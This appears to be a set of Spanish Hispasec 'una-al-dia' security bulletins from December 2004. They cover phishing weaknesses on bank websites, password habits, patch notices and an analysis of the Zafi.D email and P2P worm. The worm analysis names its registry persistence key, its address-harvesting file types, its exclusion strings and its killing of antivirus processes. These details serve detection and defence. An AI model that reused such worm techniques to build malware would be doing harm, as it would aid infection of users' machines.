El 17 de noviembre Hispasec presentó un informe en el que se analizaban estos aspectos en 50 páginas de banca online, en total 22 (un 44%) de ellas presentaban deficiencias. Transcurrido un mes, las entidades han tomado buena nota de estos resultados, 8 de ellas (un 36,3%) han corregido las deficiencias que presentaban. El dato es significativo teniendo en cuenta el corto espacio de tiempo transcurrido, lo cual es una buena muestra de la importancia que ha tenido el estudio.

Las ocho entidades que han corregido los problemas mencionados en el informe son Banco Pastor, eBankinter, Caja Inmaculada, Caja Rioja, Caja Vital, iBanesto, Kutxa y La Caja de Canarias.

Con estos bancos que han corregido el problema hace que de un 44% de páginas con fallos de diseño que favorecían los ataques de phishing hace un mes, en la actualidad esa cifra ha descendido a un 28 por ciento (14 entidades).

La solución del problema del phishing se presenta bastante complicada, cualquier estafador puede atacar un sitio web en algún lugar remoto del mundo y crear una página con la copia modificada del web de la entidad bancaria. Hispasec Sistemas presta servicios de auditoría y consultoría a entidades bancarias y todo tipo de empresas. En relación con el phishing, en primer lugar, se trata como objetivo prioritario el tratar de evitar cualquier posible problema de este tipo y minimizar su incidencia. Para ello el equipo de Hispasec Sistemas trata con la entidad todos los aspectos que puedan verse implicados (diseño, claves, configuraciones, certificados, etc.), y determinar la línea de medidas necesarias para llevar a dificultar o incluso imposibilitar la realización exitosa de este tipo de ataques.

En caso de que el ataque se haya producido, el problema debe ser abordado de manera muy diferente. Hispasec Sistemas siempre trabaja de forma conjunta con los técnicos y administradores de la entidad para establecer y seguir el plan de contingencia más adecuado a cada situación, hasta llegar a solucionar el problema. El objetivo prioritario será impedir que cualquier usuario pueda llegar a ser víctima de la estafa, reducir cuanto antes el ataque y que su incidencia sea mínima para la imagen de la entidad. De forma paralela, un equipo especializado en análisis forense realiza un completo informe en el que se desglosan todos los datos del ataque.

La tabla actualizada con los resultados de los 50 servidores webs analizados puede ser consultada a continuación:


































Más información:

una-al-dia (17/11/2004) Un 44% de las páginas web bancarias españolas favorecen el phishing
http://www.hispasec.com/unaaldia/2216

una-al-dia (30/09/2004) Implicaciones del diseño web en los ataques
"phishing"
http://www.hispasec.com/unaaldia/2168



Antonio Ropero
antonior@hispasec.com


jueves, 16 de diciembre de 2004

El lado humano de las contraseñas

No utilices una palabra conocida, ni el nombre de tu mascota, aun
menos tu fecha de nacimiento. No, tampoco vale el PIN del banco, nunca
debes utilizar la misma contraseña en dos servicios diferentes.
Recuerda, hay que combinar letras y números, si puedes meter algún
carácter especial mejor, y su longitud no debe ser inferior a ocho.
Por cierto, recuerda también que el sistema te obligará a cambiar la
contraseña todos los meses, y procura que cada vez sea distinta.
Eso es todo.

Más de uno nos reconoceremos en esas palabras, para nosotros es pura
rutina, de una lógica aplastante. Debemos de intentar mitigar los
ataques por diccionario, los ataques por fuerza bruta, prevenir la
expansión de la influencia a otros servicios si una contraseña es
comprometida, etc.

Pese a que han pasado bastantes meses, aun guardo en la retina aquella
imagen. Estaba viendo los informativos en televisión, no recuerdo el
canal, ni prestaba mucha atención. Tras las últimas elecciones en
España los ministros cumplían con el protocolo del intercambio de
carteras ministeriales. El periodista recalcaba lo previsora que había
sido la ministra saliente, que incluso había recordado facilitarle el
acceso al ordenador a la ministra entrante. Fue en ese instante
cuando el cámara activó el zoom. En un primer plano del teclado, allí
estaba, un post-it pegado en el que se podía leer la contraseña.

No se si me causó más impresión el hecho en sí, o la naturalidad y el
tono de aprobación con que el periodista narraba la anécdota.

Lo cierto es que si miramos a nuestro alrededor, en cualquier empresa,
con casi total seguridad podremos encontrarnos situaciones muy
similares. ¿Quién no conoce a un compañero de trabajo que tiene la
contraseña en un post-it pegado en el monitor? Vale, tal vez no,
puede que tus compañeros sean más precavidos y la guarden bajo el
teclado, o en la agenda del primer cajón de su escritorio.

Para ellos también es pura rutina, de una lógica aplastante. ¿Quién
es capaz de recordar tantas contraseñas y tan raras?. Encima si
falla tres veces seguidas el sistema se la bloquea, y debe pedir
a informática que le den una nueva contraseña. La última vez tardó
varias horas en poder acceder al sistema, y encima tuvo que aguantar
la guasa del administrador de sistemas. Desde que las apunta por
escrito no ha vuelto a tener problemas.

En el otro extremo tienes a los que no apuntan nada, lo deben tener
todo memorizado, como debe ser, la contraseña sólo debe estar en
la cabeza de cada usuario. Vaya, menos mal, con ellos se puede
contar.

O eso creías, hasta que en una auditoría ves que sus contraseñas son
las primeras que aparecen, casi de forma instantánea, al realizar un
ataque básico al archivo de passwords. Parece ser que no te hicieron
mucho caso cuando explicastes como debían construir una contraseña
segura.

Existe una máxima en seguridad de las TI que viene a decir que "la
seguridad es como una cadena, siempre se rompe por el eslabón más
débil". A la que habría que añadirle que el eslabón más débil suele
ser el factor humano.

Tal vez debamos tenerlo en cuenta la próxima vez que expliquemos
como construir una contraseña segura y, además de soltar el párrafo
inicial, aquél de la longitud y la composición, dedicar cinco minutos
más para explicar los ataques que se intentan prevenir, algunas
sencillas reglas mnemotécnicas para construir y recordar fácilmente
claves seguras, recomendar algún gestor de contraseñas, o advertir
del peligro de ir apuntándolas por cualquier sitio.

Con suerte, nos irá mejor que a Dilbert
http://www.dilbert.com/comics/dilbert/archive/images/dilbert200412087175.jpg


Bernardo Quintero
bernardo@hispasec.com



miércoles, 15 de diciembre de 2004

Una-al-dia también disponible a través de RSS

Hispasec, siempre en atención a las tendencias de Internet, hace
público su servicio de sindicación de boletines "una-al-dia" a través
de RSS.

Los sistemas de sindicación basados en tecnologías RSS o similares
permiten recibir notificaciones de interés o integrar contenidos de un
sitio web en otro.

En pocas palabras, este servicio permite que nuestros lectores se
mantengan al día respecto a nuestros boletines "una-al-dia" sin
necesidad de consultar su correo electrónico constantemente, o que
integren un panel con los últimos boletines Hispasec en su propia
página web, de forma simple y automática.

Hispasec desea resaltar, no obstante, que el sistema RSS es una opción
más, muy flexible, pero que los usuarios actualmente suscritos al
boletín diario remitido por correo electrónico deberían mantener su
suscripción y seguir recibiendo las notificaciones cómodamente en su
buzón.

Muchos de los lectores habituales de nuestra web habrán notado un
pequeño icono "RSS" en la parte superior de la columna de "una-al-dia".
Asimismo, los usuarios que empleen navegadores de última generación,
como Firefox, habrán visto en las últimas semanas un pequeño icono
distintivo en la parte inferior derecha de la ventana cuando acceden
al web de Hispasec, dándoles la opción de suscribirse automáticamente
a la modalidad de "live bookmarks" de Firefox, por ejemplo.

Para poder utilizar el sistema RSS como notificación es necesario
utilizar un software capaz de entender ese formato. Las últimas
versiones de Firefox, por ejemplo, incluyen esa posibilidad bajo el
nombre de "live bookmarks", en las que las entradas RSS aparecen como
"marcadores" normales y corrientes de Firefox. Lamentablemente esta
opción solo muestra las entradas actuales del RSS, no todo el
histórico.

Personalmente, mi opción recomendada es Thunderbird, el cliente de
correo electrónico del proyecto Mozilla (otro componente del proyecto
es el propio Firefox). Con este programa podemos recibir notificaciones
RSS como si se tratasen de mensajes de correo electrónico y pudiéndolos
manejar exactamente igual que éstos. Podemos, por ejemplo, almacenar un
histórico, realizar búsquedas o reenviar un boletín interesante a otro
usuario a través de email.

Otra opción tremendamente interesante para los usuarios de Jabber/XMPP
es el sistema JabRSS, que permite recibir entradas RSS a través de
mensajería instantánea, si nuestro cliente IM soporta esta
funcionalidad (el cliente "tkabber" lo soporta a la perfección, por
ejemplo).

Existen infinidad de clientes RSS, por lo que recomendamos a nuestros
usuarios que experimenten. Pueden tomar como base el artículo "Lectores
RSS para estar al día" publicado en Barrapunto hace poco más de un mes,
cuyo enlace se incluye al final de este boletín.

Los administradores de páginas web que deseen integrar nuestro "feed"
RSS en su sistema pueden hacerlo libremente siempre y cuando cumplan
las condiciones descritas más abajo. Hispasec agradecería, en ese caso,
que se le notificase este hecho, con fines estadísticos.

Dado que un lector RSS se conecta periódicamente a nuestro sistema para
actualizarse, presumiendo que el sistema será utilizado por muchos de
nuestros lectores habituales en cuanto reciban este boletín y que
nuestro "feed" cambia normalmente solo una vez al día, pedimos a
aquellos que utilicen el servicio que configuren sus clientes para
realizar un sondeo, como máximo, una vez por hora. Gracias anticipadas
por esta muestra de cortesía.

Como ocurre con los propios boletines "una-al-dia", las condiciones de
uso del sistema RSS de Hispasec se rigen por las normas descritas en
http://www.hispasec.com/copyright .

Agradeceríamos comentarios y sugerencias sobre el servicio RSS, a
través del enlace que sigue.


Jesús Cea Avión
jcea@hispasec.com


Más información:

Lectores RSS para estar al día
http://barrapunto.com/article.pl?sid=04/11/06/1151255

JabRSS
http://cmeerw.org/dev/node/7

"Feed" RSS de Hispasec
http://www.hispasec.com/rss/unaaldia.xml

Hispasec
http://www.hispasec.com/

Copyright Hispasec
http://www.hispasec.com/copyright

martes, 14 de diciembre de 2004

Microsoft publica cinco actualizaciones en diciembre

Fiel a la cita de los segundos martes de mes, Microsoft ha publicado
sus boletines de seguridad. Este mes han sido cinco los boletines,
todos ellos en relación a sistemas Windows y con un nivel de severidad
de "importante" según la propia Microsoft.

A continuación un listado de las vulnerabilidades y el software
afectado, en el apartado más información puede encontrarse las
direcciones para acceder a los avisos originales de Microsoft y la
descarga de los parches.

* Vulnerabilidades en WordPad que podrían permitir la ejecución remota
de código. (MS04-041)
Afecta a Windows NT Server 4.0, Windows NT Server 4.0 Terminal Server,
Windows 2000, Windows XP, Windows Server 2003, Windows 98 y Windows
Millenium.

* Vulnerabilidades en DHCP que podrían permitir la ejecución remota de
código y una denegación de servicio. (MS04-042)
Afecta a Windows NT Server 4.0 y Windows NT Server 4.0 Terminal Server.

* Vulnerabilidad en HyperTerminal que podría permitir la ejecución
remota de código. (MS04-043)
Afecta a Windows NT Server 4.0, Windows NT Server 4.0 Terminal Server,
Windows 2000, Windows XP y Windows Server 2003.

* Vulnerabilidades en kernel de Windows y LSASS. (MS04-044) Microsoft
publica esta actualización con objeto de remplazar varias anteriores.
Las vulnerabilidades que se resuelven podrían permitir a usuarios
locales maliciosos realizar escaladas de privilegios.
Afecta a Windows NT Server 4.0, Windows NT Server 4.0 Terminal Server,
Windows 2000, Windows XP y Windows Server 2003.

* Vulnerabilidad en WINS. (MS04-045) Microsoft resuelve varias
vulnerabilidades que podrían permitir la ejecución de código remoto,
una de las cuales ya fue descrita anteriormente en "una-al-dia" de
Hispasec con fecha 28-11-2004 .
Afecta a Windows NT Server 4.0, Windows NT Server 4.0 Terminal Server,
Windows 2000 y Windows Server 2003.


Antonio Ropero
antonior@hispasec.com


Más información:

Microsoft Security Bulletin MS04-041
Vulnerability in WordPad Could Allow Code Execution (885836)
http://www.microsoft.com/technet/security/bulletin/MS04-041.mspx

Microsoft Security Bulletin MS04-042
Vulnerability in DHCP Could Allow Remote Code Execution and Denial of
Service (885249)
http://www.microsoft.com/technet/security/bulletin/MS04-042.mspx

Microsoft Security Bulletin MS04-043
Vulnerability in HyperTerminal Could Allow Code Execution (873339)
http://www.microsoft.com/technet/security/bulletin/MS04-043.mspx

Microsoft Security Bulletin MS04-044
Vulnerabilities in Windows Kernel and LSASS Could Allow Elevation of
Privilege (885835)
http://www.microsoft.com/technet/security/bulletin/MS04-044.mspx

Microsoft Security Bulletin MS04-045
Vulnerability in WINS Could Allow Remote Code Execution (870763)
http://www.microsoft.com/technet/security/bulletin/MS04-045.mspx

una-al-dia (28/11/2004) Ejecución remota de código a través de
Microsoft WINS
http://www.hispasec.com/unaaldia/2227

lunes, 13 de diciembre de 2004

Alerta: Gusano Zafi.D aparenta ser una felicitación navideña

Zafi.D es un nuevo gusano que ha tenido un comienzo de propagación
explosivo, a juzgar por el número de mensajes infectados que han sido
detectados en las primeras horas de su expansión. Aunque también
infecta a través de redes P2P, su principal vía de propagación es el
correo electrónico, presentándose adjunto en un mensaje con un asunto
donde nos felicita la Navidad y adjuntando una hipotética postal,
que en realidad es el gusano.


En el asunto del e-mail en el que se propaga nos felicita la Navidad.
El cuerpo del mensaje, en formato HTML, puede incluir un texto
felicitando las fiestas con un pequeño gráfico animado .GIF, seguidos
de una línea con una sonrisa ":)" y el nombre del remitente. Al final
del mensaje aparece una URL con el dominio del correo electrónico del
destinatario y el nombre de archivo adjunto, simulando que se trata
de una postal gráfica.

Ejemplo de mensaje del gusano:

---

De: Usuario XXX
Para: ejemplo@victima.com
Asunto: Merry Christmas!

Adjunto: postcard.index.htm7521.cmd

Cuerpo:

* .... [gráfico animado].... *

:) Usuario XXX

http://victima.com/postcard.index.htm7521 - Picture Size: 11KB, Mail: +OK

---

Zafi.D se propaga en diferentes idiomas dependiendo del dominio de
la dirección de correo a la que se envía, de forma que los textos
utilizados pueden ser:

boldog karacsony...
Buon Natale!
Christmas - Kartki!
Christmas Kort!
Christmas pohlednice
Christmas postikorti!
Christmas Postkort!
Christmas Vykort!
ecard.ru
Feliz Navidad!
Fröhliche Weihnachten!
Glaedelig Jul!
God Jul!
Happy HollyDays!
Iloista Joulua!
Joyeux Noel!
Kellemes Unnepeket!
Merry Christmas!
Naulieji Metai!
Prettige Kerstdagen!
Prettige Kerstdagen!
Veselé Vánoce!
Weihnachten card.
Wesolych Swiat!

si un usuario ejecuta el archivo del gusano creyendo que se trata de
una postal navideña, Zafi.D simula que no puede abrirse debido a un
error, haciendo aparecer una ventana con el título "CRC: 04F78h" y
el mensaje "Error in packed file!".

Cuando aparezca ese mensaje, el gusano habrá comenzado la infección
del sistema. En la carpeta de sistema de Windows crea varios archivos,
que incluyen copias del gusano, una como "Norton Update.exe" y dos
con nombres de archivos al azar y extensión .DLL.

Introduce varias entradas en el registro de Windows, la típica en la
clave RUN para asegurarse su ejecución en cada inicio de sistema:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
"Wxp4"=C:\WINDOWS\SYSTEM32\Norton Update.exe

Y una segunda donde almacena información adicional del gusano:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wxp4

El gusano recolecta direcciones a las que enviarse de los archivos
que encuentra en el sistema infectado cuya extensión sea: .adb, .asp,
.dbx, .eml, .fpt, .htm, .inb, .mbx, .php, .pmr, .sht, .tbb, .txt,
o .wab.

Zafi.D evita enviarse a las direcciones de correo electrónico que
contenga alguna de las siguientes cadenas de texto: admi, cafee,
google, help, hotm, info, kasper, micro, msn, panda, secur, sopho,
suppor, syman, trend, use, viru, webm, win o yaho.

Para propagarse a través de redes P2P, el gusano se copia en todas
las carpetas de la unidad C: que contenta alguna de las siguientes
cadenas: share, upload o music. Los nombres de esas carpetas suelen
coincidir con los directorios utilizados por los clientes P2P para
compartir archivos, de forma que el gusano pasa a formar parte de
los archivos compartidos en la red.

Para intentar que los usuarios se lo descarguen, ejecuten e infecte,
el gusano se copia en dichas carpetas utilizando nombres llamativos,
como nuevas versiones de aplicaciones muy extendidas, ejemplos:
"winamp5.7 new!.exe" o "ICQ 2005a new!.exe".

Por último Zafi.D también incluye algunas características para
intentar evadir al software de seguridad, como antivirus y firewalls
personales, eliminando sus procesos en memoria. Adicionalmente
también intenta prevenir la desinfección manual, finalizando los
procesos que contentan las cadenas de "msconfig", "reged", o "task".

Según datos obtenidos por el servicio de Hispasec VirusTotal
(http://www.virustotal.com) y nuestro laboratorio, podemos ofrecer
los tiempos de reacción reacción de los distintos motores antivirus.

En primer lugar destacar aquellos motores que lo detectaban incluso
antes de su aparición, y por tanto mantenían a sus usuarios
protegidos desde el primer momento:

BitDefender BehavesLike:Win32.P2P-Worm
F-Prot could be infected with an unknown virus
McAfee New Malware.b
NOD32v2 probably unknown NewHeur_PE
Panda (TruPrevent)

Las firmas específicas, según hora española, estuvieron disponibles
en los siguientes tiempos:

Norman 14.12.2004 10:54 :: Nocard.A@mm
Kaspersky 14.12.2004 11:08 :: Email-Worm.Win32.Zafi.d
Sophos 14.12.2004 13:12 :: W32/Zafi-D
ClamAV 14.12.2004 13:48 :: Worm.Zafi.D
F-Prot 14.12.2004 13:48 :: W32/Zafi.D@mm
Antivir 14.12.2004 13:53 :: Worm/Zafi.D
Panda 14.12.2004 14:04 :: W32/Zafi.D.worm
DrWeb 14.12.2004 14:55 :: Win32.HLLM.Hazafi.36864
NOD32v2 14.12.2004 14:56 :: Win32/Zafi.D
BitDefender 14.12.2004 15:37 :: Win32.Zafi.D@mm
McAfee 14.12.2004 16:29 :: W32/Zafi.d@MM
eTrust-Iris 14.12.2004 17:52 :: Win32/Zafi.D.Worm
Trend Micro 14.12.2004 17:57 :: WORM_ZAFI.D


Bernardo Quintero
bernardo@hispasec.com



domingo, 12 de diciembre de 2004

5º aniversario de CriptoRed y nuevos contenidos (noviembre 2004)

Con fecha 1 de diciembre de 1999 se ponía en Internet el servidor de
CriptoRed, Red Temática Iberoamericana de Criptografía y Seguridad de
la Información. Repasamos algunos de los datos más significativos de
estos cinco años y actualizamos los contenidos con un breve resumen
de las novedades producidas durante el mes de noviembre.

Criptored es algo más que una Red Temática. Nació con el objetivo
básico de convertirse en un sitio virtual en Internet donde profesores,
investigadores y profesionales del sector de la seguridad informática
y la criptografía puedieran aportar y compartir información, en
especial de carácter docente. Es más, la información sobre estos
temas que allí se almacenara sería, en su gran mayoría, de libre
distribución (temarios de asignaturas, planes de estudio, apuntes y
notas de clase, exámenes, software de prácticas, etc.) por lo que,
además, los mayores beneficiarios de esta supresión de fronteras de
conocimientos en seguridad serían varios miles alumnos.

Transcurridos cinco años desde su puesta en marcha, los datos más
significativos de su crecimiento y consideración dentro de las Redes
Temáticas son: sobre 6.000 accesos en el buscador Google, cerca de
500 miembros de 140 universidades y 150 empresas, unos 200 artículos,
libros electrónicos, tesis y software de prácticas de libre
distribución, con unas estadísticas que cada año se han ido
duplicando, superando en la actualidad los 24.000 accesos mensuales,
en especial dirigidos a la descarga de más de 20.000 documentos cada
mes con una carga de aproximadamente 30 GigaBytes.

Además, se han organizado dos Congresos Iberoamericanos de Seguridad
Informática, CIBSI '02 y CIBSI '03 en México, siendo la sede de
CIBSI '05 en noviembre de 2005 la Universidad Técnica Federico Santa
María en Valparaíso, Chile.


CriptoRed: Resumen de Actualidad noviembre 2004


1. DOCUMENTOS NUEVOS PARA SU DESCARGA

- Formación en Seguridad Informática: el Reto Educacional de esta Década
http://www.criptored.upm.es/paginas/docencia.htm#gtletraF

Puedes encontrar otros documentos en:
http://www.criptored.upm.es/paginas/docencia.htm#gteoria

2. CONGRESOS Y SEMINARIOS POR ORDEN CRONOLOGICO DE CELEBRACION:

- Enero 31 a Febrero 4 de 2005: Sesión Tendencias Actuales en la
Criptología en Congreso MAT.es (España)
http://www.uv.es/mat.es2005/Cripto/mates2005/index.html

- Febrero 16 al 18 de 2005: X edición del Congreso Nacional de Internet,
Telecomunicaciones y Sociedad de la Información (España)
http://www.aui.es/mundointernet/

- Abril 11 al 13 de 2005: Track on e-gaming, International Conference on
Information Technology ITCC 2005 (Estados Unidos)
http://crises.etse.urv.es/itcc2005/

- Mayo 24 al 25 de 2005: Workshop on Security In Information Systems
WOSIS-2005 (Estados Unidos)
http://www.iceis.org/workshops/wosis/wosis2005-cfp.html

- Junio 6 al 8 de 2005: 7th Information Hiding Workshop IH2005 (España)
http://www.uoc.edu/symposia/ih05/

- Septiembre 14 al 16 de 2005: Simposio Seguridad Informática I Congreso
Español de Informática CEDI 2005 (España)
http://cedi2005.ugr.es/simposios.shtml

Puedes encontrar más información en:
http://www.criptored.upm.es/paginas/eventos.htm#Congresos

3. CURSOS DE POSTGRADO, ESPECIALIDAD Y FORMACIÓN:

- Master en Auditoría y Seguridad Informática en la UPM (España)
- Master en Administración y Gestión de Seguridad de la Información en
la UCM (España)
- Master en Tecnologías de Seguridad Informática esCERT-UPC (España)
- Master Tecnologías Información y Seguridad en la UCLM (España)
- Curso Experto en Seguridad Informática en la MU (España)
- Especialización en Criptografía y Seguridad Teleinformática en IESE
(Argentina)
- Diplomado en Seguridad Computacional en la Universidad de Chile (Chile)
- Diplomados en Seguridad Informática (México)
- Cursos de Seguridad Informática en el esCERT-UPC (España)
- Cursos de Seguridad Informática del Instituto para la Seguridad en
Internet ISI (España)
- Programa de Formación en Gestión de la Seguridad de la Información de
AENOR (España)
- Cursos de CYBSEC (Argentina - Ecuador)
- Curso Gratuito de Seguridad Informática en Madrid del FSE en UC3M (España)
- Curso Gratuito de Seguridad Informática en Madrid del FSE en la UPM
(España)
- Curso la Seguridad de la Información en la Empresa de esCERT (España)
- Cursos de Seguridad en Wi-Fi de IIR (España)
- Talleres de Seguridad Informática en la UNAM (México)

Puedes encontrar los enlaces y más información en:
http://www.criptored.upm.es/paginas/eventos.htm#Cursos

4. NOTICIAS SELECCIONADAS DEL MES DE NOVIEMBRE DE 2004:

- CriptoRed Alcanza los 6.000 Enlaces en el Buscador Google
http://www.google.com/search?hl=es&q=CriptoRed&meta=

- Seminario Taller Seguridad de la Información NTP-ISO/IEC 17799-1: 2004
(Perú)
http://www.criptored.upm.es/descarga/ISO_NTP_17799_2.zip

- Curso Criptosistemas de tipo RSA, Aplicaciones en el CSIC
http://www.csic.es/postgrado/cursos/cursos_2005.html#area5_espec_1

5. OTROS DATOS DE INTERES EN LA RED:

- Número actual de miembros en la red: 474
http://www.criptored.upm.es/paginas/particulares.htm

- 24.168 visitas, 224.522 hits, 20.452 archivos zip descargados y 29,11
GBytes servidos en noviembre de 2004
http://www.criptored.upm.es/cgi-bin/awstats.pl?month=11&year=2004&output=main&config=www.criptored.upm.es&framename=index

- CIBSI '05: 21 al 28 de noviembre de 2005, Valparaíso (Chile)
http://cibsi05.inf.utfsm.cl/
Organizador: Universidad Técnica Federico Santa María
http://www.utfsm.cl/
Próximamente se enviará el primer CFP


Jorge Ramió Aguirre
Coordinador Red Temática Iberoamericana CriptoRed



sábado, 11 de diciembre de 2004

Actualización de Opera evita diversas vulnerabilidades

Se ha publicado una actualización del navegador Opera versión 7.54
con objeto de evitar diversas vulnerabilidades.

Entre las vulnerabilidades corregidas cabe destacar la anunciada
recientemente, y que fue analizada por Hispasec en una noticia anterior,
relativa a la falsificación de contenido de ventanas y que podía ser
empleado para la realización de ataques de phishing.

Otras vulnerabilidades corregidas permitían la falsificación del tipo
de archivo en los cuadros de descarga, un problema de seguridad en la
clase LiveConnect y un problema con JavaScript o applets de Java que
permitía recuperar el nombre de usuario registrado y el directorio de
instalación. También se ha mejorado el soporte para la directiva de
cache "must-revalidate".

Se puede descargar la versión actualizada de Opera desde:
http://www.opera.com/download/


Antonio Ropero
antonior@hispasec.com


Más información:

Advisory: Opera security advisory 2004-12-10
http://www.opera.com/support/search/supsearch.dml?index=782

viernes, 10 de diciembre de 2004

Revelación de información sensible en Squid 2.5

Se ha descubierto una vulnerabilidad en Squid 2.5 (para todas las
plataformas) que puede ser explotada por usuarios maliciosos
remotos para acceder a información potencialmente sensible.

La vulnerabilidad se debe a un problema en el retorno de mensajes de
error ante nombres de host mal construidos, lo que en determinadas
circunstancias puede filtrar información aleatoria sobre, por ejemplo,
otras peticiones en dichos mensajes de error.

La dirección para descargar el parche de actualización que corrige
este problema es la siguiente:
http://www.squid-cache.org/Versions/v2/2.5/bugs/squid-2.5.STABLE7-dothost.patch


Julio Canto
jcanto@hispasec.com


Más información:

Squid May Disclose Random Internal Information to Remote Users
http://securitytracker.com/alerts/2004/Dec/1012466.html

Squid returns random error messages
http://www.squid-cache.org/bugs/show_bug.cgi?id=1143

jueves, 9 de diciembre de 2004

Nueva técnica de "phishing"

Publicada una nueva técnica de "phishing" que aprovecha la posibilidad
de falsear las ventanas pop-up abiertas desde una web auténtica. El
ataque puede ser reproducido en la mayoría de navegadores, como
Internet Explorer, Mozilla/Firebird y Opera, entre otros.

Este nuevo método requiere que el usuario mantenga simultáneamente
abiertos dos sitios webs en su sistema, el real y el del atacante.
De forma que al pinchar el usuario sobre un enlace en la web real
se visualice una ventana abierta desde el sitio web del atacante.

Un escenario probable es que el atacante envíe un e-mail falso a
los usuarios con un enlace que abra ambos sitios web, la página
real de una entidad bancaria y, en segundo plano, la página del
atacante. El usuario visualizaría la página auténtica de la entidad
bancaria y, al pinchar en un enlace de dicha web real, se mostraría
una ventana pop-up, con el logotipo de la entidad e imagen
corporativa, solicitando el usuario y la clave de acceso.

Sin saberlo, el usuario estaría entregando sus datos de acceso al
atacante, ya que la nueva ventana, aunque ha aparecido tras pinchar
un enlace en la web de su banco, ha sido abierta en realidad por el
sitio web del atacante que se encontraba en segundo plano.

La técnica empleada puede necesitar algunas modificaciones dependiendo
de si el navegador del usuario mantiene algún tipo de sistema para
bloquear las ventanas pop-up y evitar publicidad no deseada.

Como prueba de concepto, y con el ánimo de que los usuarios puedan
reconocer y prevenir estafas basadas en esta técnica, facilitamos
un ejemplo.

En este caso encontraremos dos enlaces a la web de Banesto, deberemos
elegir uno u otro en función de si nuestro navegador utiliza algún
sistema para bloquear pop-up. Al pinchar en el enlace, se abrirá en
una nueva ventana la web auténtica de Banesto. En el menú de la
izquierda debemos seleccionar la opción "Banesnet empresas" y pulsar
el botón Aceptar. Si aparece una nueva ventana de Hispasec, nuestro
navegador se encuentra afectado por esta nueva modalidad de
"phishing".

Prueba de concepto disponible en:
http://www.hispasec.com/directorio/laboratorio/Software/tests/inyeccion_ventana.html

En estos momentos no existe actualización para los navegadores que
ayude a prevenir esta técnica "phishing", sin embargo los usuarios
pueden protegerse mediante una serie de sencillas reglas de este
tipo de estafas.

1) No utilizar enlaces para acceder a sitios web sensibles, como la
banca electrónica. Ignorar especialmente los mensajes de correo
electrónico que nos soliciten, con cualquier excusa, acceder a estos
sitios webs.

2) Antes de entrar en el sitio web de nuestro banco, cerrar todas
las ventanas del navegador, abrir una nueva y teclear directamente
la URL en el campo de dirección.

3) Antes de introducir nuestras claves de acceso, asegurarse que en
la ventana aparece la dirección de nuestra entidad y que la URL
comienza por "https://". En la parte inferior del navegador, en la
barra de estado, deberá estar visible un candado cerrado o una llave
completa, que nos indica que estamos conectados con un servidor
seguro y los datos se están transmitiendo de forma cifrada.

4) Comprobar el certificado de seguridad, para ello debemos hacer
doble click en el candado cerrado o la llave (según el navegador),
y verificar que los datos corresponden a nuestra entidad. Aunque
sabemos que esta medida en la práctica no suele llevarse a cabo, no
es por ello menos recomendable.

Información adicional sobre la nueva técnica de "phishing" y los
navegadores afectados puede consultarse en el aviso original de
Secunia: http://secunia.com/secunia_research/2004-13/advisory/


Bernardo Quintero
bernardo@hispasec.com



miércoles, 8 de diciembre de 2004

Acceso no autorizado a almacenamiento de correo en Novell NetMail

Se ha anunciado la existencia de una vulnerabilidad en Novell NetMail
que puede ser empleada por usuarios remotos para acceder al almacén de
correo.

Durante el proceso de instalación, las credenciales de autenticación por
defecto del protocolo NMAP (Network Messaging Application Protocol) se
asignan de forma automática y no se fuerza a su cambio al finalizar la
instalación. De esta forma, a través de NMAP un usuario remoto podrá
conseguir acceso al almacén de correo con permisos de lectura,
escritura y de envío no autorizado de mensajes.

Se recomienda emplear la utilidad nmapcred (NetMail/NIMS NMAP
Credential Generator) para cambiar las credenciales de autenticación
NMAP por defecto. Esta utilidad se encuentra disponible para descarga
en las siguientes localizaciones:
Para Windows:
http://support.novell.com/servlet/filedownload/sec/pub/nmapcred_win32.zip/
Para NetWare:
http://support.novell.com/servlet/filedownload/sec/pub/nmapcred_nw.zip/
Para Linux:
http://support.novell.com/servlet/filedownload/sec/pub/nmapcred_i386.tgz/


Antonio Ropero
antonior@hispasec.com


Más información:

Novell NetMail Default Authentication Credentials Lets Remote User
Access the Mail Store
http://securitytracker.com/alerts/2004/Dec/1012429.html

NetMail/NIMS NMAP Credential Generator- Win32
http://support.novell.com/cgi-bin/search/searchtid.cgi?/2970344.htm

NetMail/NIMS NMAP Credential Generator- Linux
http://support.novell.com/cgi-bin/search/searchtid.cgi?/2970324.htm

NetMail/NIMS NMAP Credential Generator for NW
http://support.novell.com/cgi-bin/search/searchtid.cgi?/2970343.htm

martes, 7 de diciembre de 2004

Vulnerabilidad en Battlefield 1942 y Vietnam

Se ha dado a conocer una vulnerabilidad por el que los usuarios de
estos juegos en modo multijugador pueden verse afectados por un
ataque por denegación de servicio

Battlefield 1942 y Vietnam son dos juegos muy populares basados en
conflictos bélicos, desarrollado por Digital Illusions y lanzados
al mercado en septiembre de 2002 y marzo de 2004 respectivamente.

Como cualquier juego multijugador las máquinas de los jugadores
contactan con un servidor principal que comunica los servidores
online disponibles, así como información sobre jugadores que están
en línea y el escenario a disputar. El problema reside en el
parámetro "numplayers", de forma que si el servidor contesta
un número de jugadores excesivamente grande conseguirá paralizar
el cliente y posteriormente una caída del mismo.

Electronic Arts, distribuidor de los juegos, ofrece un parche que
corrige este problema:
Battlefield 1942 1.61b
http://www.eagames.com/official/battlefield/1942/us/editorial/community_message_51.jsp
Battlefield Vietnam 1.21
http://www.eagames.com/official/battlefield/vietnam/us/editorial.jsp?src=community_update_28


Antonio Román
roman@hispasec.com


Más información:

Battlefield 1942 and Vietnam
http://aluigi.altervista.org/adv/bfcboom-adv.txt

lunes, 6 de diciembre de 2004

Microsoft publica Windows Server 2003 SP1 Release Candidate

Microsoft anuncia la disponibilidad para descarga de Windows Server
2003 Service Pack 1 Release Candidate.

La versión publicada es la candidata a publicación final del
Service Pack 1 para Windows Server 2003, y hay que señalar que
está destinada sólo para su instalación en entornos de prueba.
Aunque éste proceso puede ser recomendable en determinados
entornos para comprobar y evaluar las nuevas características
y su impacto en los sistemas.

El SP1 para Windows Server 2003 proporciona múltiples mejoras
de seguridad que pueden ser de interés para un gran número de
administradores. De hecho, todas las razones anunciadas en el
"Top Ten de las razones para instalar Windows Server 2003 SP1"
están relacionadas de forma directa con la mejora de seguridad.

A diferencia de otros Service Pack que solo podían considerarse
como la agrupación de todos los parches publicados, Microsoft ha
aprovechado la oportunidad para introducir nuevas funcionalidades
a Windows Server 2003.

Las mejoras incluidas son un Firewall similar al publicado con
Windows XP Service Pack 2, Post-Setup Security Updates (PSSU)
destinado a bloquear todas las conexiones entrantes tras la
instalación hasta que se ejecute Windows Update para instalar
